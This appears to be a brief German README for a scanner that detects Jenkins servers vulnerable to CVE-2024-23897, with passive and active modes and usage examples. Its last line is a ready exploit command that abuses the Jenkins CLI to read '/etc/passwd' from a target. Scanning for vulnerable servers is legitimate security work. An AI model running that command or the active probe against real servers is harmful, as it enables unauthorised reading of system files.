
Findet Jenkins-Umgebungen und prüft auf CVE-2024-23897
Finde Jenkins-Umgebungen und prüfe auf CVE-2024-23897
Testet die Pfade: /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json
Identifiziert über:
Passiv (Standard): vergleicht die erkannte Version mit den Schwellwerten:
Aktiv (--active): sendet den Handshake des binären Jenkins-CLI-Protokolls über HTTP. Antwortet der Server mit 200 + Content-Type: application/octet-stream, bestätigt dies, dass der CLI-Kanal offen ist und der Exploit anwendbar ist.
python jenkins_scan.py -f urls.txt
python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt
python jenkins_scan.py -f urls.txt -t 20 -v --no-color
java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"